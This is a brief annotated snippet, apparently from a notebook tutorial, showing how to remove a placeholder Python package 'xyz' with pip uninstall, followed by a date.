uninstall # A command to uninstall a package
xyz # The package to uninstall from the system
```
!pip uninstall xyz
```
March 29, 2026